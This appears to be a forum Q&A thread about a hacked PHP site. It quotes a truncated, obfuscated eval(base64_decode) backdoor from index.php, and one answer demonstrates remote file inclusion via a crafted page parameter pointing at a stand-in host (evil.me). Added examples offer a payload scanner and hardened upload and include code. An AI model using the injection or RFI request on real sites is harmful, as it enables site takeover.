views: 406
answers: 9

I just checked my site and it suddenly jumps me to this site:

xxxp://www1.re*******3.net/?p=p52dcWpkbG6HjsbIo216h3de0KCfaFbVoKDb2YmHWJjOxaCbkXp%2FWqyopHaYXsiaY2eRaGNpnFPVpJHaotahiaJ0WKrO1c%2Beb1qfnaSZdV%2FXlsndblaWpG9plmGQYWCcW5eakWppWKjKx6ChpqipbmdjpKjEjtDOoKOhY56n1pLWn1%2FZodXN02BdpqmikpVwZWpxZGxpcV%2FVoJajYmJkZ2hwlGGXaVbJkKC0q1eum5qimZxx

I found out that the first line of my index.php file looks like this:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHR /* snip */ "));?>

How do I stop this? Thanks!

UPDATE: What kind of attack is this? Is this really XSS? No one really knows my FTP password.

A: 

Just remove this line, and patch your server up. Most likely you are infected by a backdoor.

TBH
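Removing the one line from index.php is only the start; the same injector usually touches every PHP file it can write to. As an added example (not from the question or any answer), this PHP script walks a web root, flags each eval(base64_decode("...")) occurrence, and decodes the payload for review without executing it. The web root path is an assumption.

```php
<?php
// Added example: find eval(base64_decode("...")) injections under a web root
// and show the decoded payload for review. The payload is NEVER executed.
// '/var/www/html' is an assumed path; adjust for your host.

function find_base64_eval(string $webroot): array
{
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($webroot, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (!in_array(strtolower($file->getExtension()), ['php', 'php5', 'phtml', 'inc'], true)) {
            continue;
        }
        $hits = array_merge($hits, scan_file((string) $file));
    }
    return $hits;
}

// Returns one entry (file, line, decoded preview) per occurrence in $path.
function scan_file(string $path): array
{
    $src = @file_get_contents($path);
    if ($src === false) {
        return [];
    }
    $found = [];
    $re = '/eval\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+\/=]+)[\'"]/';
    if (preg_match_all($re, $src, $m, PREG_OFFSET_CAPTURE)) {
        foreach ($m[1] as $i => [$b64, $offset]) {
            // Line number of the full match, for the incident notes.
            $line = substr_count(substr($src, 0, $m[0][$i][1]), "\n") + 1;
            $decoded = base64_decode($b64, true);
            $found[] = [
                'file'    => $path,
                'line'    => $line,
                'preview' => $decoded === false ? '(not valid base64)' : substr($decoded, 0, 120),
            ];
        }
    }
    return $found;
}

foreach (find_base64_eval('/var/www/html') as $hit) {
    printf("%s:%d  %s\n", $hit['file'], $hit['line'], $hit['preview']);
}
```

Run against the line quoted in the question, the preview starts with if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])), which is worth keeping for the hosting provider's incident report before the line is deleted.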
+1  A: 

Remove the line of code?

This is an attack on your server that allowed the attacker to alter the server files. This can be through folder permissions (having a 777 permission is bad), or if you allow your scripts to alter other scripts on your server.

You might want to look over your folder permissions.

Chacha102
Yeah, I have removed it. So far my site is working properly. But I have the feeling that there will be another attack.
jun
@jun: you are guaranteed another attack. If you haven't plugged the hole, then you are guaranteed they'll do it again.
Chris Lively
A: 

Most people stop code injection attacks by removing the viral code first, and then making all PHP files read only while looking for the exploit that the attack used to write to your PHP files.

Earlz
What on earth is making the files read-only going to do? If *you* have the permissions necessary to make them read only, and *your* account was compromised, then whatever got to the files can *remove* the read-only attribute.
George Edison
@Geor I was assuming that PHP doesn't run under the same account as the regular user. For instance, most of the time there is a very limited httpd user that is used by PHP, and then you (the regular/FTP user) retain ownership over the PHP files and can mark them read-only and whatnot.
Earlz
Which, btw, is how it **should** be set up for security.
Earlz
@Earlz: I agree. What I am saying is that the FTP account was likely compromised and in that case making the files read only does nothing.
George Edison
+7  A: 

Someone has access (not through XSS or SQL injection) to your PHP files on your server. If this is a shared server it is very possible that the entire server was compromised somehow. You can remove that crap at the top of your PHP files, and make them read-only. However, as I'm guessing this is a shared server, if your web host doesn't fix the security flaw that allowed this in the first place, it may not be enough. Talk to your hosting provider (personally I'd just move to a new provider; this is a good sign that these guys are hopeless.)

Eloff
yeah, I am on a shared server.
jun
A: 

Most of the time it's FTP passwords stolen from the developer's PC by some trojan program.

Col. Shrapnel
and evidence for this statement?
Malfist
omg, you are free not to trust me.
Col. Shrapnel
@Col. Shrapnel, we certainly are. But we're all interested in this stuff, so if you know of an interesting or relevant article that backs up your statement, we'd be interested in reading it. Plus it's always nice to cite one's sources (however often we, and especially *I*, don't)... =)
David Thomas
Well, I don't have any. First time I heard of it was on the local forum, and then from my own experience.
Col. Shrapnel
"most of the time"? no! sometimes? yes!
hasen j
+1  A: 

Secure your server, try contacting the relevant people, the server seems to have been compromised.

Sarfraz
+1  A: 

"What kind of attack is this? Is this really XSS? No one really knows my FTP password."

There are several vectors for this kind of attack:

Software vulnerability. This could include outdated PHP, MySQL, Apache or just about anything else running. The entire server may have been compromised.

Scripting vulnerability. A vulnerability, usually in a widely used PHP application, used to upload and execute commands. A common one is in photo gallery software that is tricked into uploading renamed PHP files, allowing the extension to be renamed on the server from jpg back to the original php, and then run, allowing for any action allowed by scripts (usually a PHP admin/root kit is uploaded this way, giving the attacker the ability to freely upload and alter files).

FTP brute force attack. Generally your server should be configured to be able to IP-block addresses that make repeated failed login attempts.

User infection. A relatively new vector of attack: a trojan (most so far use vulnerabilities in the Adobe PDF Reader plugin, due to the fact that this works in Firefox, but any browser exploit that allows code execution will work) is installed onto a passing user's computer. The trojan searches the user's computer for common FTP programs like Filezilla and Dreamweaver, looking for saved passwords. Once it locates an FTP login it accesses that site from the user's own computer and attempts to modify known file types (htm, php, asp, etc.), inserting its own code (most search for the HEAD tag and insert just after that), the same code that originally infected the user's computer. Once it is done it can work like any other trojan (install adware, or stay hidden and make the user's computer part of a botnet).

David
A: 

We had the same problem. Really ashamed to admit it, but it happened to us because users were able to upload files with any extension and run them on the server. So some user had uploaded a PHP script and executed it. :-)

We've solved the problem by setting filters and read-only attributes on uploaded files.

Bar
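As an added example of the "filters" Bar mentions (this is not Bar's code), here is an upload handler that accepts an image only when its last extension is on an allow-list, the bytes really are that image type, and the stored copy gets a server-chosen name in a directory the web server does not execute PHP from. The upload directory path is an assumption.

```php
<?php
// Added example: allow-list upload validation. Not from the answer above.
// '/srv/uploads' is an assumed directory outside the web root.

const ALLOWED = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

function store_upload(array $file, string $uploadDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('no valid upload');
    }
    // Decide by the LAST extension only; "x.php.jpg" is treated as .jpg and
    // its bytes must still pass the content sniff below.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException("extension .$ext not allowed");
    }
    // Sniff the real type from the bytes, never from the client's Content-Type.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException("content is $mime, expected " . ALLOWED[$ext]);
    }
    // Discard the client's filename entirely: a random name cannot be guessed,
    // and the extension is the one we validated, not one the client chose.
    $dest = rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('move failed');
    }
    chmod($dest, 0644); // readable by the web server, never executable
    return $dest;
}

// Usage inside the upload endpoint:
// $path = store_upload($_FILES['photo'], '/srv/uploads');
```

Serve the stored files through a download script or from a location where the web server has PHP handling disabled, so a validated .jpg can never be executed even if another bug lets it be renamed.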
+3  A: 

If you have open_wrappers = on, and you are using something like this somewhere on the site:

http://domain.tld/index.php?page=somenameofpage

Somewhere in index.php (or included files):

<?php
include($page . '.php');
?>

Then somebody could compromise your site by requesting:

http://domain.tld/index.php?page=http://evil.me/evilcode.txt?

(The value of page should be urlencoded to work; I'm lazy so I didn't urlencode it. Note the ? at the end.)

What you are now actually including is:

http://evil.me/evilcode.txt?.php

-- evilcode.txt --

<?php
echo 'some evil code huh!';

This will execute the PHP code in evilcode.txt.

A quick fix would be to add a . to the path of the include, like this:

include('./' . $page . '.php');

I learned this the hard way. Became admin of an existing site that used this method for navigation. Took me months to figure it out, even though the hacker didn't replace any code; he just added files in some subfolders. And yeah, he added some backdoors in .js and .css files that a user's AntiVir picked up.

Phliplip
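As an added example (not Phliplip's code), the vulnerable include from the answer is shown next to a hardened version that maps ?page= through an allow-list of known files, so neither a URL nor any path outside the pages directory ever reaches include(). The page names and the pages/ directory are assumptions. The php.ini directive that governs including URLs is allow_url_include, which is Off by default in current PHP and should stay that way.

```php
<?php
// Added example, not from the answer. Vulnerable pattern kept for contrast.

// VULNERABLE (as in the answer): the query-string value goes straight into include().
function include_page_vulnerable(string $page): void
{
    include($page . '.php');
}

// HARDENED: the request parameter selects a known file; it is never a path.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute path of the allowed page, or null when $page is unknown
// or the resolved file does not live under $pagesDir.
function resolve_page(string $page, string $pagesDir): ?string
{
    if (!isset(PAGES[$page])) {
        return null; // unknown name: 404, do not try to be clever
    }
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . '/' . PAGES[$page]);
    // Belt and braces: even an allow-listed entry must resolve inside pages/.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$page = $_GET['page'] ?? 'home';
$file = resolve_page($page, __DIR__ . '/pages');
if ($file === null) {
    http_response_code(404);
    exit('No such page');
}
include $file;
```

Unlike the ./ prefix quick fix, which only stops the remote URL, the allow-list also rejects any local path the parameter could name, so there is nothing left for a crafted value to reach.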